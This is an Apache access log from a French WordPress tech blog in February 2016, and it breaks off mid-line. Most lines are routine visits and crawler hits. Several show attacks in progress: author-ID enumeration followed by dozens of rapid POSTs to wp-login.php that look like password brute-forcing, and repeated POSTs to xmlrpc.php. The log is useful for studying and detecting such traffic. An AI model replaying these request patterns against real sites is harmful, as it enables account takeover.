[09/Feb/2016:14:29:39 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n86.246.217.7 - - [09/Feb/2016:14:32:15 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"Mozilla/5.0 Vienna/3.0.9\"\n207.46.13.35 - - [09/Feb/2016:14:32:32 -0800] \"GET /category/how-to/ HTTP/1.1\" 200 6082 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n130.0.236.153 - - [09/Feb/2016:14:32:53 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n85.255.232.11 - - [09/Feb/2016:14:33:31 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/xavier-mouton-dubosc-le-developpeur-aux-mille/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n85.255.232.11 - - [09/Feb/2016:14:33:31 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/xavier-mouton-dubosc-le-developpeur-aux-mille/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n85.255.232.11 - - [09/Feb/2016:14:33:31 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/xavier-mouton-dubosc-le-developpeur-aux-mille/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n85.255.232.11 - - [09/Feb/2016:14:33:31 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/xavier-mouton-dubosc-le-developpeur-aux-mille/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n85.255.232.11 - - [09/Feb/2016:14:33:31 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n85.255.232.11 - - [09/Feb/2016:14:33:31 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 593 \"http://techmeup.co/xavier-mouton-dubosc-le-developpeur-aux-mille/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:14:35:54 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n89.89.153.231 - - [09/Feb/2016:14:38:23 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n89.89.153.231 - - [09/Feb/2016:14:38:24 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n89.89.153.231 - - [09/Feb/2016:14:38:24 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n89.89.153.231 - - [09/Feb/2016:14:38:24 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n89.89.153.231 - - [09/Feb/2016:14:38:24 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n89.89.153.231 - - [09/Feb/2016:14:38:28 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n89.89.153.231 - - [09/Feb/2016:14:38:29 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4\"\n40.77.167.6 - - [09/Feb/2016:14:41:18 -0800] \"GET /techmeup-le-monde-merveilleux-de-la-tech HTTP/1.1\" 301 437 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n41.228.167.4 - - [09/Feb/2016:14:43:56 -0800] \"GET /wp-login.php HTTP/1.1\" 200 3065 \"-\" \"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\"\n130.0.236.153 - - [09/Feb/2016:14:44:36 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n80.12.43.112 - - [09/Feb/2016:14:46:45 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n130.0.236.153 - - [09/Feb/2016:14:47:33 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n78.193.52.251 - - [09/Feb/2016:14:51:06 -0800] \"GET /creer-sa-startup-seul-et-la-revendre-a-un-geant/ HTTP/1.1\" 200 10050 \"https://www.google.fr\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n78.193.52.251 - - [09/Feb/2016:14:51:06 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n78.193.52.251 - - [09/Feb/2016:14:51:06 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n78.193.52.251 - - [09/Feb/2016:14:51:06 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n78.193.52.251 - - [09/Feb/2016:14:51:06 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n43vwqRZpY1r792z4-50x50.jpg HTTP/1.1\" 200 2491 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n78.193.52.251 - - [09/Feb/2016:14:51:07 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n198.58.103.36 - - [09/Feb/2016:14:52:00 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n40.77.167.76 - - [09/Feb/2016:14:52:18 -0800] \"GET /robots.txt HTTP/1.1\" 200 423 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n207.46.13.29 - - [09/Feb/2016:14:52:24 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.231 - - [09/Feb/2016:14:52:43 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.161 - - [09/Feb/2016:14:52:58 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n157.55.39.161 - - [09/Feb/2016:14:52:59 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n78.154.190.29 - - [09/Feb/2016:14:54:48 -0800] \"GET /?author=1 HTTP/1.1\" 200 6136 \"-\" \"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)\"\n78.154.190.29 - - [09/Feb/2016:14:54:51 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:54:53 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:54:55 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:54:56 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:54:58 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:00 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:02 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:03 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:05 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:07 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:08 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:10 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:12 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:13 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:15 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:17 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:18 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:20 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:22 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:23 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:25 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:27 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:28 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1897 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:30 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1897 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:32 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1862 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:34 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:36 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:38 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:40 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:42 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:44 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:45 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:47 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:50 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:51 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:53 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:55 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:56 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:55:58 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:00 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:01 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:03 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:05 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:06 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:08 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:09 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:11 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1904 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n130.0.236.153 - - [09/Feb/2016:14:56:12 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n78.154.190.29 - - [09/Feb/2016:14:56:14 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1903 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:15 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1903 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:17 -0800] \"GET /?author=3 HTTP/1.1\" 200 6635 \"-\" \"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)\"\n78.154.190.29 - - [09/Feb/2016:14:56:19 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:20 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:22 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:24 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:26 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:27 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:29 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:30 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n78.154.190.29 - - [09/Feb/2016:14:56:32 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1898 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\"\n40.77.167.6 - - [09/Feb/2016:14:56:48 -0800] \"GET /techmeup-le-monde-merveilleux-de-la-tech HTTP/1.1\" 301 437 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n198.58.102.158 - - [09/Feb/2016:15:00:00 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n62.210.250.66 - - [09/Feb/2016:15:05:15 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [09/Feb/2016:15:08:14 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:15:11:25 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:15:14:17 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n157.55.39.231 - - [09/Feb/2016:15:17:14 -0800] \"GET /tagged/MotionLead HTTP/1.1\" 404 4872 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n90.79.192.180 - - [09/Feb/2016:15:17:16 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n90.79.192.180 - - [09/Feb/2016:15:17:27 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n180.76.15.15 - - [09/Feb/2016:15:19:18 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n90.79.192.180 - - [09/Feb/2016:15:19:50 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n90.79.192.180 - - [09/Feb/2016:15:20:02 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n130.0.236.153 - - [09/Feb/2016:15:23:02 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 